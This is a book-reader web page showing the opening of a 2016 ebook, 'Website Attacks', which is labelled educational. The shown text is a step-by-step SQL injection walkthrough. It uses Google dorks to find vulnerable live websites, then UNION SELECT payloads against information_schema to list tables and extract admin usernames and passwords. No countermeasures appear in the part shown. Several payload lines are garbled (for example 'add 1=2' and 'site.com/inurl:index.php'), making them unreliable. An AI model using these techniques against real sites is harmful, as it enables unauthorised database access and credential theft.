• Complain

Prajwal Naik - Website Attacks

Here you can read online Prajwal Naik - Website Attacks full text of the book (entire story) in english for free. Download pdf and epub, get meaning, cover and reviews about this ebook. year: 2016, publisher: UNKNOWN, genre: Computer. Description of the work, (preface) as well as reviews are available. Best literature library LitArk.com created for fans of good reading and offers a wide selection of genres:

Romance novel Science fiction Adventure Detective Science History Home and family Prose Art Politics Computer Non-fiction Religion Business Children Humor

Choose a favorite category and find really read worthwhile books. Enjoy immersion in the world of imagination, feel the emotions of the characters or learn something new for yourself, make an fascinating discovery.

No cover
  • Book:
    Website Attacks
  • Author:
  • Publisher:
    UNKNOWN
  • Genre:
  • Year:
    2016
  • Rating:
    3 / 5
  • Favourites:
    Add to favourites
  • Your mark:
    • 60
    • 1
    • 2
    • 3
    • 4
    • 5

Website Attacks: summary, description and annotation

We offer to read an annotation, description, summary or preface (depends on what the author of the book "Website Attacks" wrote himself). If you haven't found the necessary information about the book — write in the comments, we will try to find it.

Prajwal Naik: author's other books


Who wrote Website Attacks? Find out the surname, the name of the author of the book and a list of all author's works by series.

Website Attacks — read online for free the complete book (whole text) full work

Below is the text of the book, divided by pages. System saving the place of the last page read, allows you to conveniently read the book "Website Attacks" online for free, without having to search again every time where you left off. Put a bookmark, and you can go to the page where you finished reading at any time.

Light

Font size:

Reset

Interval:

Bookmark:

Make

Web ATTACKs

v1.0

- Prajwal Naik
Copyright 2016
ABOUT
The book looks at common Web attacks, finding vulnerabilities and protecting.It is important for Web developers and administrators to have a thorough knowledge of these attacks.New web-based attack types and vectors are coming out every day, this is causing businesses, communities and individuals to take security seriously now more than they ever have in the past. This is a huge win for the World Wide Web and its a trend that is pushing technology further towards more robust and securely developed web applications.Considering the somewhat poor programming approach which leads to these attacks, some countermeasures are offered to help prevent future vulnerabilities and subsequent attacks.
* For educational purpose only.
Common Attacks Affecting Websites
1. SQL Injection
2. Cross-Site Scripting (XSS)
3.Inclusion Vulnerabilities: LFI and RFI

4.Dos

5.BROKEN AUTHENTICATION AND SESSION MANAGEMENT

6.MISSING FUNCTION LEVEL ACCESS CONTROL

7.Cross-site request forgery

1.SQL Injection

Before starting with SQLi , we should know what SQL and database are.

Database is collection of data. In website, database is used for storing user ids,passwords,web page details,etc.

SQL used to communicate with the Database.

Some Basic Queries for SQL:

For creating data:

CREATE DATABASE is used to create a new, empty database.

DROP DATABASE is used to completely destroy an existing database.

USE is used to select a default database.

CREATE TABLE is used to create a new table, which is where your data is actually stored.

ALTER TABLE is used to modify an existing table's definition.

DROP TABLE is used to completely destroy an existing table.

For manipulating data:

SELECT is used when you want to read (or select) your data.

INSERT is used when you want to add (or insert) new data.

UPDATE is used when you want to change (or update) existing data.

DELETE is used when you want to remove (or delete) existing data.

REPLACE is used when you want to add or change (or replace) new or existing data.

*here we use manipulation of data.

what can an attacker do with SQLi?

An attacker can use SQL injection to bypass authentication .

An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.

An attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.

An attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an applications availability until the database is restored.

An attacker could use SQL injection as the initial vector in an attack of an internal network that sits behind a firewall.

In short attacker can : 1. ByPass Logins

2.Access secret data

3.Modify contents of website

4,Shutting down the My SQL server

Finding vulnerable website.

1.Finding Vulnerable Website

Best tool for SQL injection is Google. We can find the Vulnerable websites using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. But we are going to use inurl: command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

copy one of the above command and paste in the google search engine box.

Hit enter.

You can get list of web sites.

We have to visit the websites one by one for checking the vulnerability.

Eg: www.site.com/inurl:index.php?id=1

2.Checking the Vulnerability

Now check the vulnerability of website. In order to check the vulnerability ,add a single quote () at the end of the url and hit enter.

Eg: www.site.com/inurl:index.php?id=1

If the page doesnt change or showing that page not found or showing some other pages. Then it is not vulnerable.

If it showing any errors which is related to sql query, then it is vulnerable.

Ex: Warning: mysql_fetch_array() use right syntax near line 1.

3. Finding Number of columns

Now we found the website is vulnerable. Next is to find the no.of columns in the table.

For that replace the single quote() with order by x-- statement.

Change the x from 1,2,3,4,,5,6,x. Until you get the error like unknown column .

Eg: www.site.com/inurl:index.php?id=1 order by 1--

..

..3--

. 4--

www.site.com/inurl:index.php?id=1 order by 5--

If you will get error at 5 then no.of columns are x-1

I.e no.of columns 5-1 = 4.

4. Displaying the Vulnerable columns

Using union select columns query we will find the vulnerable part of the table so, replace the order by n with this statement. Change the id value to negative i.e index.php?id=-1 .Add add 1=2 before union 1=2 is false.Replace the columns with the no from 1 to x-1 separated with commas.If the no.of columns is 4 so query is should be

www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,2,3,4--

Then the page will show an error which contains numbers less than x-1 or equal to it.

Let's assume that error showing 2.

Replace the no.2 with user(). To find user column.

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,user(),3,4--

5. Finding Version

Replace 2 with version().

www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,version(),3,4--

It's important to check version.

6. Finding table name

As i said finding version is important .if the version is 4 or below you have to guess the table name.

If you get version 5 then,

Replace the 2 with group_concat(table_name) and at the end before -- add the

from information_schema.tables where table_schema=database()

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--

Now you will get all table names. As we dont need all tables, select tables which is related to admin or users.

So let's now select admin table.

7. Finding column name

replace the group_concat(table_name) with the group_concat(column_name) as we have to find column. And Replace the

from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=mysqlchar--

Find MysqlChar() for Tablename:

First of all install the HackBar addon in mozilla

goto SQL - Mysql-MysqlChar()

A window will be opened, as we selected admin table so write admin and click ok.

And it will give some code in brackets.

Copy and paste in the place of mysqlchar.

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(10,18,50,72)--

Now it will show the list of columns.

Ex: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password.etc.

Replace the replace group_concat(column_name) with group_concat(columnname,0x3a,another columnname).

Next page
Light

Font size:

Reset

Interval:

Bookmark:

Make

Similar books «Website Attacks»

Look at similar books to Website Attacks. We have selected literature similar in name and meaning in the hope of providing readers with more options to find new, interesting, not yet read works.


Reviews about «Website Attacks»

Discussion, reviews of the book Website Attacks and just readers' own opinions. Leave your comments, write what you think about the work, its meaning or the main characters. Specify what exactly you liked and what you didn't like, and why you think so.